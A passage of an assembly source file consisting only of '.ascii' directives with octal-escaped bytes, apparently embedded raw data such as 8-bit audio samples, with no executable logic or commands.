"\007\020\020\023$\024###) $\034\032*.7bOOB,* \013\372" .ascii "\377\351\344\344\350\334\347\357\357\334\301\326\341" .ascii "\346\357\364\362\366\376\353\364\367\356\002\000\001" .ascii "\022\030:NEE48%\021\014\006\377\000\003\370\362\345" .ascii "\335\332\336\320\325\331\344\372\373\365\361\342\350" .ascii "\355\343\351\355\355\340\354\362\350\361\360\376\022" .ascii "\022\022\376\001\375\362\377\373\357\353\325\316\313" .ascii "\270\300\304\312\333\370\013\035,'\022\017\001\355\347" .ascii "\332\340\335\345\370\375\375\003\006\375\016!%/\"\031" .ascii "\031\012\012\017\002\007\003\375\002\360\366\366\366" .ascii "\006\013\011\020\021\010\017\014\007\011\023\025\035" .ascii "%\036 \026\025\033\027\0371<M]NC:%\025\017\000\373\365" .ascii "\350\350\336\337\343\345\345\321\276\303\314\327\343" .ascii "\340\351\355\357\362\375\376\373\004\000\003\017&;M" .ascii "JF;,!\025\011\377\001\364\371\360\345\344\331\324\330" .ascii "\325\324\343\343\355\350\345\350\343\345\346\346\350" .ascii "\352\350\353\351\345\350\353\360\374\015\013\011\001" .ascii "\370\367\364\365\362\353\335\330\311\302\304\300\303" .ascii "\317\335\357\012\020\026\021\007\001\363\355\345\340" .ascii "\334\342\351\362\371\000\001\003\014\026''+(\035\031" .ascii "\022\021\017\016\012\012\003\002\001\372\371\377\000" .ascii "\010\020\015\025\023\021\021\020\017\023\031\034\037" .ascii "\035 \034\035\036\"(/BNUOE8*\035\024\013\377\372\362" .ascii "\356\351\352\350\345\331\313\303\300\317\324\334\344" .ascii "\346\353\364\367\373\005\004\011\014\024\0361?GI@<1" .ascii "$\031\020\006\000\372\366\362\350\345\336\332\331\333" .ascii "\334\341\346\350\352\347\347\345\345\343\352\351\354" .ascii "\361\354\360\355\355\362\370\375\003\005\002\000\374" .ascii "\372\366\366\355\350\337\325\321\312\310\306\313\323" .ascii "\341\355\376\006\007\010\001\373\361\352\340\341\337" .ascii "\347\360\364\376\001\005\013\022\031&)++%!\033\030\022" .ascii "\023\017\020\016\012\010\005\002\002\007\010\020\020" .ascii "\024\027\025\024\023\023\023\030\030\036\037 ! !%-6" .ascii "FMRNC8*\036\023\015\003\001\373\366\362\356\350\340" .ascii "\325\306\303\302\312\322\331\337\344\351\360\370\373" .ascii "\005\011\016\024\034&3>CF?;1%\032\020\005\000\372\363" .ascii "\362\351\346\341\335\332\332\333\336\345\344\347\345" .ascii "\344\341\342\341\344\350\351\360\355\360\360\361\357" .ascii "\366\371\375\000\375\000\373\371\365\361\352\346\336" .ascii "\326\324\314\313\312\315\321\334\346\362\371\373\373" .ascii "\365\357\346\341\333\335\340\346\357\366\375\002\007" .ascii "\012\023\030\"'()% \032\027\021\022\017\020\020\013" .ascii "\011\005\003\002\005\006\015\017\022\025\023\021\016" .ascii "\017\016\024\025\032\036\036\037 !%-5BHJG=1&\033\016" .ascii "\013\003\000\374\365\361\353\343\331\317\302\301\301" .ascii "\306\315\323\330\336\344\352\365\371\003\011\016\024" .ascii "\034$/9;?;5-\"\027\015\004\374\371\361\357\352\345\340" .ascii "\336\332\332\334\334\342\341\342\342\340\336\337\337" .ascii "\340\346\345\353\353\354\355\356\356\362\366\366\373" .ascii "\370\371\367\365\360\356\350\342\337\327\325\317\315" .ascii "\314\317\321\333\343\350\360\357\357\353\346\340\335" .ascii "\331\333\340\344\355\363\372\000\006\012\022\027\034" .ascii "#\"# \036\031\031\024\023\023\020\020\014\012\010\007" .ascii "\005\011\012\014\021\021\023\021\021\017\021\017\022" .ascii "\025\025\031\031\033\035!$,3:@><5-\"\034\021\014\007" .ascii "\000\375\367\362\354\346\333\324\311\305\306\307\316" .ascii "\323\332\337\350\354\364\372\377\006\013\022\032%+5" .ascii "664-(\037\030\017\012\000\375\367\361\356\351\346\345" .ascii "\345\342\346\344\345\346\343\344\343\343\342\345\344" .ascii "\350\350\350\353\352\354\355\360\361\366\365\366\367" .ascii "\365\365\364\362\357\356\347\344\336\330\326\323\323" .ascii "\326\333\337\347\351\354\356\352\351\345\342\340\341" .ascii "\337\345\350\355\365\372\000\007\015\022\032\034 ! " .ascii " \037\035\033\034\030\031\026\023\022\020\015\016\017" .ascii "\016\024\022\025\027\025\026\025\024\024\027\024\030" .ascii "\027\030\032\033\035\"',56:951*#\034\030\017\014\005" .ascii "\000\373\366\357\351\342\327\324\315\315\317\322\330" .ascii "\336\344\353\363\366\376\001\007\015\023\032#,0632," .ascii "% \032\023\015\011\001\376\370\363\360\356\354\354\355" .ascii "\353\356\353\353\352\350\350\350\350\351\354\352\354" .ascii "\353\353\354\354\355\360\363\363\367\365\367\366\365" .ascii "\364\364\362\357\356\347\345\337\333\332\331\332\337" .ascii "\344\346\354\353\354\352\347\344\343\341\342\346\346" .ascii "\355\360\364\373\000\005\014\022\026\035\035\037\037" .ascii "\036\036\036\035\034\036\032\032\027\024\023\021\020" .ascii "\022\024\024\031\027\030\030\026\026\026\026\025\030" .ascii "\026\030\027\027\031\033\036$*-432/*% \033\025\023\012" .ascii "\010\001\373\365\357\350\341\333\324\324\320\322\325" .ascii "\330\335\344\352\357\367\372\001\005\011\020\026\036" .ascii "%+,0+'#\035\027\023\016\010\006\376\374\366\362\360" .ascii "\356\355\355\357\355\357\353\353\352\350\350\351\351" .ascii "\352\354\351\353\352\351\351\353\354\356\362\361\365" .ascii "\363\364\363\362\361\361\357\353\353\343\341\335\331" .ascii "\331\332\334\337\344\344\350\346\344\342\340\337\337" .ascii "\341\342\350\351\356\363\367\374\001\007\014\023\025" .ascii "\032\032\032\033\033\032\033\033\031\033\026\025\022" .ascii "\017\016\016\017\020\024\023\026\025\024\024\023\022" .ascii "\023\024\023\025\023\023\024\023\025\031\035\"'(+)&" .ascii "#\036\031\026\022\014\013\003\376\370\361\353\344\336" .ascii "\330\326\321\322" .ascii "\321\322\327\333\341\347\356\361\371\374\001\006\012" .ascii "\021\030\036\"(&&\"\035\032\025\020\014\012\004\002" .ascii "\374\367\364\360\356\356\356\355\360\355\355\354\351" .ascii "\351\350\351\351\354\351\353\352\350\350\347\350\351" .ascii "\354\355\361\360\361\362\360\361\360\360\356\356\351" .ascii "\347\342\336\334\331\332\333\337\337\344\342\342\342" .ascii "\337\337\336\337\340\345\347\354\357\361\367\372\377" .ascii "\004\013\016\024\026\030\032\030\032\032\033\033\034" .ascii "\031\030\026\022\021\017\016\017\022\022\026\025\025" .ascii "\025\023\024\023\023\023\025\023\024\023\021\023\023" .ascii "\026\032\037!&%$#\037\034\031\026\022\020\011\005\377" .ascii "\367\363\353\345\340\334\326\326\324\324\327\330\335" .ascii "\343\350\355\365\371\375\002\004\013\020\027\034\"$" .ascii "&$! \032\030\024\022\012\005\373\367\362\355\354\353" .ascii "\354\356\363\363\370\367\371\371\372\371\374\373\376" .ascii "\374\376\367\361\310\355\365\341\361\003:3FVc\010\000" .ascii "\364\374+\341\351\276\316\333\345\353\353\012\373\036" .ascii "\010\011\010\274\320\310\322+\335\321\363\373\000\274" .ascii "\332\335\005\000<)\006&\353,\370\014\336\330\362\353" .ascii "\027\333\365\314\272\266\265\247\256\360\350\345\375" .ascii "\007\006\032\007\007\373\330\342\256\241\245\244\331" .ascii "\331\362\007\001\011\011\375\"2\005\014\350\357\372" .ascii "\002\012\356\005\377\034\023'GB]?A%12\026$#2\0330 ;" .ascii "HRM.?\"F!#<SM4$\006=\023\015\357\336\326\314\360\314" .ascii "\375\003\022\361\276\305\310\365\336\360\324\320\316" .ascii "\254\253\251\325\314\346\324\346\006\0206\036,\024\013" .ascii "\363\326\337\344\352\336\354\336\375\375\006\026\036" .ascii "3\006\012\350\005\020\020\036\364\022\002\010\362\373" .ascii "\023\025-\013\020\012 \032\036+ 3\017\024\006\031%\017" .ascii "\004\327\332\320\334\320\354\001\005\030\022*)G)\032" .ascii "\374\335\317\247\260\236\277\317\342\341\342\005\372" .ascii "\011\372\375\365\361\334\304\323\303\344\315\316\324" .ascii "\333\377\364\011\005\032\026\013\371\364\014\007\021" .ascii "\002\005\371\011\013\015(-?\034\036\027*63E>cTMDCD7" .ascii "'\371\007\371\014\025\021.*=\032\005\000\025\035\016" .ascii "\012\353\370\345\342\341\362\003\004\016\371\036/JN" .ascii ":2\027\012\344\347\337\345\343\315\313\316\344\341\366" .ascii "\335\352\350\320\321\272\330\323\334\311\302\307\303" .ascii "\317\275\321\307\326\315\300\301\311\356\350\377\361" .ascii "\366\361\350\353\343\000\371\361\312\301\300\313\336" .ascii "\337\364\377\037\0375@JZ:)\004\000\363\350\345\343\000" .ascii "\010\035\027->JQ;8&+\021\016\021\026%\014\014\000\034" .ascii ")3-\",\033\034\011\025\032$\025\375\002\371\017\001" .ascii "\002\371\374\376\346\352\350\011\013\023\014\024( #" .ascii "\012\017\374\361\321\263\271\273\333\325\343\350\370" .ascii "\367\336\331\315\351\337\322\276\275\305\313\326\312" .ascii "\346\351\377\001\014.E\\H?&(\036\025\022\012\031\006" .ascii "\001\364\010\032!%\020\031\017\023\006\011\032\036\"" .ascii "\004\003\374\016\022\004\376\366\374\354\363\356\012" .ascii "\034\035\033\006\022\014\025\007\002\375\357\335\272" .ascii "\270\266\322\325\331\333\350\005\005\033\025$\030\000" .ascii "\341\301\305\272\303\255\266\277\314\337\340\370\001" .ascii "\026\001\365\344\342\360\346\353\337\354\345\342\333" .ascii "\342\376\010\021\371\372\370\003\004\002\017\023\"\015" .ascii "\006\000\016\032\016\010\366\000\374\003\006\0275;B" .ascii "6FQ_VA8\036\027\367\361\364\013\036\033\037\032/)$\017" .ascii "\011\014\375\363\334\353\362\007\001\373\005\015%$;" .ascii "F]ZG7&3)&\021\016\006\375\371\352\376\001\010\363\344" .ascii "\342\350\365\354\364\360\370\354\335\325\327\350\334" .ascii "\321\267\266\267\274\306\312\343\353\362\337\332\337" .ascii "\352\360\331\321\275\272\252\241\242\256\302\300\307" .ascii "\301\334\364\006\014\002\006\362\351\314\306\313\321" .ascii "\322\300\305\312\351\364\004\017\031\"\017\010\374\021" .ascii "\032!\027\014\022\017\027\014\034%/&\025\027\036:9?" .ascii ":?B63,=6+\020\003\014\026()<EQMJU]gP:\035\021\007\374" .ascii "\374\375\021\022\022\011\016\035\036\023\365\351\333" .ascii "\332\317\314\332\345\361\344\340\337\366\010\021\032" .ascii "\033*!\033\013\021\033\030\015\362\356\345\352\342\336" .ascii "\340\336\335\307\307\310\342\355\353\346\337\345\335" .ascii "\335\323\334\332\317\274\251\260\267\317\322\335\343" .ascii "\355\361\347\356\357\375\361\341\313\302\306\301\310" .ascii "\302\320\323\327\331\337\371\014\036\021\011\375\367" .ascii "\363\350\354\352\361\346\337\334\354\006\022\036\030" .ascii "\037\034\034\031\035.25#\037\037(-*+$(\032\032\035/" .ascii "BBC6=9<844$\030\377\001\007\033&(02@>HKRL5\037\006\006" .ascii "\376\003\375\374\376\375\001\373\010\010\013\364\334" .ascii "\313\301\310\305\322\323\337\335\331\332\335\365\377" .ascii "\014\006\011\013\015\021\015\030\023\023\001\364\356" .ascii "\355\363\351\346\325\323\312\307\314\326\352\354\356" .ascii "\340\341\341\344\350\340\341\322\313\271\267\273\311" .ascii "\334\333\344\341\356\360\365\371\370\371\347\336\313" .ascii "\317\323\330\332\323\330\323\340\341\362\001\014\020" .ascii "\001\374\357\367\363\370\364\360\360\345\352\351\375" .ascii "\011\026\023\017\023\021\037\036,-2-$'&500\"\033\031" .ascii "\027 $9:@749:B95$\034\015\006\014\021$$*(2;BLGI7*\027" .ascii "\016\015\016\017\003\003\373\001\003\006\013\005\375" .ascii "\343\325\305\311\316\324\334\331\340\334\343\344\361" .ascii "\375\002\006\375\004\004\022\026\033\034\024\022\001" .ascii "\001\370\376\372\360\343\322\320\311\324\326\345\351" .ascii "\351\350\337\345\343\356\346\341\323\310\304\272\302" .ascii "\303\323\324\331\331\334\351\352\367\356\356\340\330" .ascii "\320\313\323\323\335\323\322\315\321\332\340\357\360" .ascii "\370\355\353\343\343\354\353\357\345\345\336\343\345" .ascii "\354\372\374\002\372\377\000\015\027\035% &\037$&+0" .ascii "*$\024\025\020\033\"*427078@?5-\033\031\020\025\027" .ascii " %%,+<AMLH>1,\037$\036\"\032\022\017\012\024\021\032" .ascii "\020\012\371\347\337\326\340\341\354\347\353\354\357" .ascii "\374\373\012\010\015\007\012\017\027'&/$#\033\030\027" .ascii "\022\024\004\374\347\342\335\341\350\353\363\356\364" .ascii "\353\357\360\362\365\351\342\321\317\307\313\315\320" .ascii "\327\323\332\330\343\347\357\356\344\337\322\322\314" .ascii "\322\324\326\324\313\314\306\321\323\334\336\333\332" .ascii "\321\323\317\330\331\334\331\322\322\316\330\327\342" .ascii "\341\343\343\340\351\355\376\001\013\011\012\016\015" .ascii "\030\025\035\024\017\004\375\000\002\017\016\032\026" .ascii "\033\035\037''.\"\036\017\013\011\007\017\015\026\023" .ascii "\033\034&17@65'&!\"#\036 \022\024\014\023\025\027\025" .ascii "\010\001\355\354\342\346\352\354\362\357\367\366\004" .ascii "\007\020\022\017\023\017\032\036.4:946/5//$\030\014" .ascii "\376\377\372\005\005\012\011\010\012\010\020\014\021" .ascii "\006\377\365\353\354\350\357\354\361\355\361\364\366" .ascii "\001\000\006\373\367\355\351\352\351\361\355\360\347" .ascii "\345\342\343\351\351\356\345\345\334\334\335\337\345" .ascii "\342\345\334\336\332\337\343\343\346\337\342\335\346" .ascii "\352\364\376\000\010\002\012\011\022\023\025\023\006" .ascii "\004\365\371\366\376\003\005\011\005\015\012\024\023" .ascii "\026\021\010\003\367\372\364\374\370\372\373\373\004" .ascii "\005\023\024\034\026\022\015\006\012\005\014\006\006" .ascii "\376\372\370\365\374\367\372\355\345\331\320\315\311" .ascii "\320\315\324\322\327\334\342\354\357\365\356\363\362" .ascii "\370\002\012\030\032!\035! #&\036\035\014\007\371\366" .ascii "\364\367\375\373\001\374\001\001\005\010\006\005\373" .ascii "\367\355\355\367\354\362\353\362\322\353\001\370\020" .ascii "\355\347\343\337\346\031\013\004\013\033\037\013\025" .ascii "\376\376\373\032\010\012\024\372\014\364\004\373\352" .ascii "\000\342\341\006\374\344\007\322\317\356\343\365\365" .ascii "\001\005\031\025\014\02342A<96\031-)#)<@>G@1@'\"!\034" .ascii "\016\374!\012\007\020\003\374\005\002\013!\0379\023" .ascii "\030 \012\014\0235 \034\030\034\024\024\036\032\013" .ascii "\013\021\352\357\344\320\313\323\334\333\341\345\347" .ascii "\343\346\347\332\336\347\327\361\001\002$\026\017\032" .ascii "\010\036\031\031\031\017\014\000\010\000\002\000\010" .ascii "\377\370\013\003\006\374\365\347\341\340\327\341\316" .ascii "\320\306\316" .ascii "\313\306\315\307\337\344\350\355\334\331\345\322\345" .ascii "\365\344\002\372\352\372\355\355\347\352\337\333\334" .ascii "\330\345\337\341\334\330\326\325\312\324\330\322\323" .ascii "\307\311\305\313\325\335\361\370\003\001\005\012\002" .ascii "\016\027\031!\032\022 \016\023!\034\" )*-0\037\026\016" .ascii "\376\373\001\004\010\003\006\000\367\000\001\006\012" .ascii "\035\025\020\025\010\016\021\030!&*+(%\031\025\022\377" .ascii "\007\373\362\372\356\356\344\340\330\330\343\352\361" .ascii "\370\371\351\347\337\350\354\001\026\026($*(+/(,(*!" .ascii "\035\031\030\032\030\030 $\035*\034\023\020\373\372" .ascii "\353\356\360\366\370\370\363\347\345\343\357\363\374" .ascii "\374\376\365\355\366\360\375\005\017\017\020\031\017" .ascii "\020\012\004\373\370\372\370\373\374\373\361\366\351" .ascii "\352\352\347\362\356\355\342\337\322\323\334\350\374" .ascii "\010\024\022\031\024\025\031\037% )#&&)*$)(0075+!\021" .ascii "\007\000\005\004\017\014\015\014\373\375\372\377\004" .ascii "\016\015\015\014\006\006\005\017\020\034 #!\035\034" .ascii "\020\011\373\366\353\352\356\354\354\343\336\320\320" .ascii "\320\326\334\340\341\326\326\312\316\326\337\364\375" .ascii "\011\016\023\020\021\020\016\021\013\017\012\015\010" .ascii "\010\007\005\006\001\012\010\017\014\006\371\350\336" .ascii "\322\327\331\343\343\345\337\325\322\314\323\323\335" .ascii "\331\331\335\326\333\333\342\345\361\363\372\376\374" .ascii "\376\363\360\341\341\333\336\344\350\360\347\346\330" .ascii "\324\317\323\330\327\330\320\314\300\303\306\321\340" .ascii "\353\370\372\006\003\011\012\007\013\012\016\020\032" .ascii "\033\" \036\036\033!#-)&\034\017\005\372\377\000\011" .ascii "\014\015\011\000\374\366\373\371\000\000\003\004\004" .ascii "\012\012\022\020\030\031\035$\"%\034\024\004\375\364" .ascii "\364\371\372\000\366\363\345\341\334\336\343\343\347" .ascii "\337\340\332\334\340\354\371\002\021\026 \037$!\036" .ascii "\034\025\030\026\"#(' \036\030\033\035%! \024\006\374" .ascii "\361\364\364\374\375\377\374\366\363\353\355\350\352" .ascii "\351\352\355\357\367\367\376\375\002\004\012\023\026" .ascii "\033\022\014\375\366\361\362\375\001\012\006\003\370" .ascii "\361\354\351\354\347\352\341\340\332\334\341\345\360" .ascii "\365\002\006\023\027\034\035\031\027\021\030\033)/7" .ascii "721)//885. \031\017\020\020\026\027\031\027\021\021" .ascii "\010\011\002\000\376\377\005\011\024\025\032\027\027" .ascii "\030\033#&+#\033\014\002\373\371\000\001\006\000\374" .ascii "\361\350\344\336\341\334\336\332\331\332\334\342\345" .ascii "\357\362\376\005\021\032\035\036\025\021\007\011\014" .ascii "\026 #&\036\032\022\024\024\030\031\024\016\000\372" .ascii "\357\360\356\360\362\360\363\355\357\350\344\335\326" .ascii "\324\321\332\335\352\354\360\357\354\360\361\376\001" .ascii "\011\004\375\362\346\344\342\353\357\366\365\363\355" .ascii "\345\343\333\332\322\317\313\311\313\314\323\322\331" .ascii "\332\342\353\365\001\005\012\002\000\371\373\003\013" .ascii "\032\036$\037\036\031\031\035\035\"\033\030\016\012" .ascii "\005\004\006\002\006\001\004\001\003\001\373\367\354" .ascii "\352\345\356\364\376\006\006\010\003\006\005\016\021" .ascii "\025\022\010\001\364\362\356\363\364\365\364\355\353" .ascii "\341\341\332\327\321\314\312\310\317\321\334\337\344" .ascii "\347\354\366\376\014\017\024\016\010\003\377\006\012" .ascii "\025\030\033\030\025\022\017\023\020\021\012\004\375" .ascii "\370\367\364\367\363\364\361\360\361\360\362\354\351" .ascii "\335\330\324\327\341\347\361\361\365\361\363\366\373" .ascii "\002\001\004\371\365\354\352\354\355\364\362\366\361" .ascii "\362\356\355\353\343\337\324\323\315\323\327\335\344" .ascii "\343\351\351\363\371\006\014\017\017\007\007\003\014" .ascii "\022\035$&($'$)(&#\034\031\023\026\024\027\026\023\023" .ascii "\017\023\022\025\020\014\003\373\371\370\002\010\021" .ascii "\024\025\025\022\027\027\037\035\034\025\014\007\000" .ascii "\003\002\006\003\001\375\367\370\362\363\353\346\335" .ascii "\330\330\331\344\350\361\363\370\373\001\014\023\036" .ascii "\035\037\030\024\022\023\034\037'%'#!\"!#\035\032\020" .ascii "\014\007\006\011\007\013\005\005\000\002\003\004\004" .ascii "\373\367\353\351\347\355\365\372\001\377\002\377\004" .ascii "\007\013\016\012\007\375\372\365\370\372\374\377\373" .ascii "\374\370\371\371\367\363\353\345\333\332\331\337\346" .ascii "\352\357\357\364\365\000\007\017\025\023\022\013\015" .ascii "\015\027\036$)'*&+*-*% \027\030\024\032\032\033\032" .ascii "\026\026\022\030\025\030\022\013\004\374\375\376\010" .ascii "\014\023\024\022\024\022\031\031\035\031\024\014\004" .ascii "\002\376\003\001\003\376\372\367\363\364\357\357\345" .ascii "\337\330\322\325\330\343\350\357\360\365\371\377\013" .ascii "\020\030\027\025\017\014\016\020\032\033 \036\035\033" .ascii "\031\034\032\032\021\015\003\377\377\376\004\002\003" .ascii "\376\375\373\374\377\374\374\362\355\343\342\344\351" .ascii "\362\364\372\366\371\370\374\001\002\004\373\370\356" .ascii "\355\353\356\362\361\363\356\356\352\355\354\352\346" .ascii "\333\326\315\317\320\330\335\341\346\344\353\355\370" .ascii "\377\005\006\003\002\375\003\005\017\025\031\033\031" .ascii "\033\031\036\035\036\031\021\015\006\010\010\016\017" .ascii "\017\015\011\012\010\015\014\012\004\373\365\360\364" .ascii "\367\000\004\007\007\006\010\010\016\016\017\010\001" .ascii "\373\364\365\365\371\366\366\360\355\353\347\352\344" .ascii "\341\326\320\312\310\316\323\335\337\346\346\354\362" .ascii "\371\004\007\014\007\006\002\003\011\015\024\024\030" .ascii "\022\023\022\023\024\020\016\003\377\367\367\370\373" .ascii "\377\374\374\366\370\366\372\372\367\362\350\344\335" .ascii "\341\344\353\360\362\364\361\365\365\374\375\374\371" .ascii "\360\355\347\351\352\357\357\355\354\350\351\347\352" .ascii "\347\343\333\322\316\311\317\323\333\335\340\342\344" .ascii "\353\360\372\375\001\377\374\374\375\005\012\023\025" .ascii "\027\030\027\032\033\036\033\030\020\012\006\005\012" .ascii "\013\021\016\016\013\012\014\015\020\013\010\376\370" .ascii "\364\365\373\377\007\005\011\006\011\013\016\021\015" .ascii "\013\001\376\370\372\374\374\376\370\367\360\361\356" .ascii "\357\354\344\336\322\317\313\322\327\336\343\345\352" .ascii "\352\364\371\004\010\012\011\005\007\006\017\023\032" .ascii "\033\032\033\031\034\032\035\027\023\012\002\000\375" .ascii "\003\004\010\005\003\001\377\002\002\005\000\373\362" .ascii "\354\351\351\360\363\372\371\373\372\374\000\003\006" .ascii "\002\377\367\364\362\363\367\370\371\364\357\353\352" .ascii "\355\354\360\350\350\337\341\340\351\357\364\371\367" .ascii "\372\367\375\376\004\376\372\351\345\363\347\303\357" .ascii "\011-<-\0120?\034\011\360\370\355\037\336,\002\347\363" .ascii "\346\026\013<\367'\343\313\346\271%\012\326\316\356" .ascii "\023\364\257\250\341\345$.\035\022\037\013\033\037\372" .ascii "\366\376\021\002\012\344\347\305\262\276\260\257\317" .ascii "\341\321\347\012\023\010\376\355\376\365\331\273\244" .ascii "\244\241\240\306\315\356\006\344\356\366\0134)\012\022" .ascii "\024\010\004\007\366\000\003\020\026\"KOECSPE5%*@2)" .ascii "'#-622<BA$,5D^TN>4%\021\001\367\370\347\325\324\340" .ascii "\355\377\360\365\341\306\324\301\316\340\340\316\303" .ascii "\270\251\272\274\256\307\336\340\351\354\010-9/\021" .ascii "\007\377\363\366\337\347\370\370\360\362\376\011\034" .ascii "\035\020\002\030\023\032\025\012\036\015\015\377\364" .ascii "\000\016\011\371\010\015\030\027\010\0368=4 \024\032" .ascii "\033 \015\374\001\347\334\310\313\344\370\376\375\023" .ascii ")=1\"\023\021\376\323\274\250\257\260\266\303\316\333" .ascii "\343\352\325\357\007\004\004\346\342\345\340\324\316" .ascii "\320\341\342\342\351\354\016\016\014\015\017\027\027" .ascii "\014\005\023\025\023\003\002\010\035,#\035 .1,,BZfe" .ascii "XQVK5&\031\033\026\003\006\020(5-&\025\015\007\002\006" .ascii "\013\010\002\361\336\350\365\367\356\361\371\010\027" .ascii "\0311?B1\027\002\374\376\356\335\322\321\327\330\313" .ascii "\317\333\340\344\321\316\327\333\340\317\315\320\317" .ascii "\310\275\265\300\312\302\277\274\307\323\331\331\352" .ascii "\003\012\002\353\350\366\375\372\354\336\331\334\317" .ascii "\312\333\357\005\020\021$EMJ</,\037\010\360\354\365" .ascii "\374\377\003\013\"/+-6DF<) **!\020\022\030\025\023\016" .ascii "\030\"( \025\032\"\"\033\020\013\021\007\371\361\360" .ascii "\374\372\356\344\346\364\375\372\375\014 1%\030\025" .ascii "\030\012\357\335\317\322\315\310\311\327\356\365\355" .ascii "\335\327\324\326\321\314\324\336\332\315\320\327\351" .ascii "\361\351\357\377\031*5@JOF2&)($\020\004\010\017\016" .ascii "\003\010\021\036\034\021\017\030'#\030\016\020\023\010" .ascii "\373\366\372\376\372\350\351\363\000" .ascii "\011\006\016\030\035\022\002\376\006\007\372\342\320" .ascii "\321\313\305\277\304\327\347\357\357\375\020\033\022" .ascii "\374\357\347\335\311\270\260\271\304\300\277\310\334" .ascii "\352\357\352\362\000\002\375\360\361\371\374\361\342" .ascii "\337\352\363\360\357\364\002\011\003\002\011\032 \035" .ascii "\022\020\030\025\014\000\002\013\015\003\375\007\030" .ascii "(*/=S[XOIM>&\020\011\016\020\014\013\031&,\036\017\010" .ascii "\013\013\000\371\373\005\004\374\371\000\017\021\013" .ascii "\013\0310>BDMNE4%$$\030\002\365\360\366\362\350\343" .ascii "\351\363\356\347\343\357\373\371\352\336\336\335\330" .ascii "\307\300\302\306\300\263\263\277\321\327\326\330\341" .ascii "\352\344\331\323\331\332\316\273\256\257\263\263\253" .ascii "\263\303\325\337\341\356\000\016\005\364\346\344\337" .ascii "\323\306\302\317\327\332\330\342\370\011\020\014\022" .ascii "\037(%\034\037'*\037\023\020\031# \033\036*22.6GNJ<" .ascii "9<:0! $&\034\024\033.=>AK\\`ZNHF8!\011\002\006\013\004" .ascii "\377\007\020\022\004\364\356\362\357\343\331\330\344" .ascii "\344\340\333\341\355\360\354\350\370\014\032\033\033" .ascii "!&#\023\010\005\005\373\346\330\324\333\330\320\310" .ascii "\315\327\330\326\324\341\354\353\337\324\325\327\323" .ascii "\306\301\277\304\301\270\272\306\331\337\340\341\352" .ascii "\362\357\351\343\351\347\337\317\305\311\315\320\312" .ascii "\317\333\353\364\370\003\017\032\022\005\371\367\367" .ascii "\357\347\342\352\361\365\365\375\016\033\"\036$,440" .ascii "147.$ ',)%#+/118CHD9544+ \033\031\031\023\020\026#." .ascii "14:EJG=4/\"\021\000\373\374\376\373\365\367\371\371" .ascii "\356\344\335\333\330\316\312\311\323\330\331\330\334" .ascii "\343\345\347\350\365\002\015\020\017\024\026\027\016" .ascii "\010\003\377\367\351\340\334\337\333\326\317\317\326" .ascii "\330\332\334\344\351\351\341\333\333\334\333\323\315" .ascii "\312\313\312\307\313\323\340\345\345\347\353\362\363" .ascii "\361\355\354\351\344\333\325\331\333\335\331\333\342" .ascii "\355\366\373\003\010\015\010\377\370\366\367\363\360" .ascii "\353\360\365\372\376\005\021\030\036\034 '.20212-)(" .ascii "*.)&!&*.16<==5432+!\033\030\030\025\027\034$,.26?CA" .ascii ":/(\034\023\010\005\005\004\000\373\371\367\367\356" .ascii "\346\335\330\324\316\316\320\331\335\340\340\342\350" .ascii "\353\361\364\375\005\014\016\016\024\025\030\022\014" .ascii "\006\000\372\361\354\346\345\340\331\324\323\330\333" .ascii "\337\337\343\344\343\340\334\334\333\332\322\315\311" .ascii "\311\312\313\320\323\332\334\336\340\344\351\351\351" .ascii "\342\341\336\333\327\325\327\326\327\323\326\332\343" .ascii "\352\356\362\363\365\360\356\352\353\353\350\346\344" .ascii "\350\356\365\372\000\006\012\016\020\026\035$)()(*(" .ascii ")(((#!\037$(.026786641*#\037\035 #&*/39=EFC<3-%!\033" .ascii "\031\024\023\017\012\010\006\004\373\362\350\343\340" .ascii "\336\341\344\353\355\360\361\365\373\001\006\010\016" .ascii "\021\026\032\035\"$%\037\032\023\017\012\004\377\370" .ascii "\363\353\347\342\343\347\351\352\350\351\350\351\347" .ascii "\346\343\337\333\323\320\316\320\322\323\323\324\327" .ascii "\330\334\335\340\341\340\334\330\326\325\325\323\322" .ascii "\320\315\314\313\316\320\326\330\331\331\330\332\331" .ascii "\332\327\327\325\323\322\323\331\335\344\346\351\355" .ascii "\360\366\373\002\010\016\017\021\021\023\025\026\026" .ascii "\022\021\017\015\015\016\023\026\032\032\036 $&%$ \034" .ascii "\026\023\021\024\026\030\033\032 $*04875.+&%!\035\032" .ascii "\026\025\021\021\015\013\004\373\363\353\352\350\354" .ascii "\355\361\365\370\374\000\010\014\023\025\030\033 '," .ascii "36863/,*$ \027\020\013\006\004\003\004\004\006\004\003" .ascii "\004\005\005\003\001\373\367\361\357\355\355\357\356" .ascii "\360\356\357\361\364\365\366\366\364\362\356\355\354" .ascii "\355\355\351\350\343\342\341\341\341\341\342\337\337" .ascii "\335\337\337\341\340\336\334\331\331\330\334\336\343" .ascii "\344\345\350\351\357\364\373\376\003\006\007\011\012" .ascii "\015\014\014\010\005\001\000\001\000\004\004\006\006" .ascii "\007\011\014\017\016\015\010\004\000\375\374\374\376" .ascii "\376\001\000\003\005\012\017\022\024\023\023\017\015" .ascii "\012\012\010\004\001\374\373\370\367\364\360\352\342" .ascii "\332\322\317\316\320\321\324\327\331\337\342\352\356" .ascii "\364\370\373\376\003\012\021\031\036!\"\"! \036\032" .ascii "\026\020\010\004\377\377\376\000\375\374\371\371\372" .ascii "\374\377\000\002\375\375\366\357\337\344\004\036\014" .ascii "\364\361\373\023\033\270\3630\352\037\030\377\015\374" .ascii "\366\026\010\313\026\364\2565\352\344\021\365\011\007" .ascii "\310\000>\310\347!\022\325\365\355\360\342\340\364\333" .ascii "\323\307\346\315\353\023\002\002)##\020\3732A\021\022" .ascii "I\360\325\000\340\364\002\001\350\315\307\006\032\332" .ascii "\322\006\346\263\021\367\320\266\250\342\311\332\026" .ascii "\005\362\006\014\"?B;)\024\031&.\360\016'\007\0328S" .ascii ",\014\032*\365\011\022\343\324\374\376\362\006\354\354" .ascii "\331\277\300\361\360\364\014\371\0049QJK1*.)6<\015\027" .ascii "R./D*!\367\310\323\343\336\356\005\354\354\021\371\357" .ascii "\320\274\321\307\317\371\361\353\017\013\035\027\016" .ascii "\025\357\334\352\012\013\374#\022\0365)7\036\032\000" .ascii "\371\036-7\035\002\005\000\346\333\322\315\270\242\311" .ascii "\333\306\300\305\312\317\351\364\322\315\274\337\362" .ascii "\317\357\375\331\327\360\342\002\361\014\022\000'-;" .ascii ",9\037\007#\031\005\015\374\375\027\023\004 \026\354" .ascii "\010\004\376\004\325\320\330\300\316\347\332\326\004" .ascii "\002\346\005\025\014\025\006\011\036\031\0305\036\031" .ascii ".$=5?:.\007%.\0376->8WZL-\032\022\020\356\014\013\350" .ascii 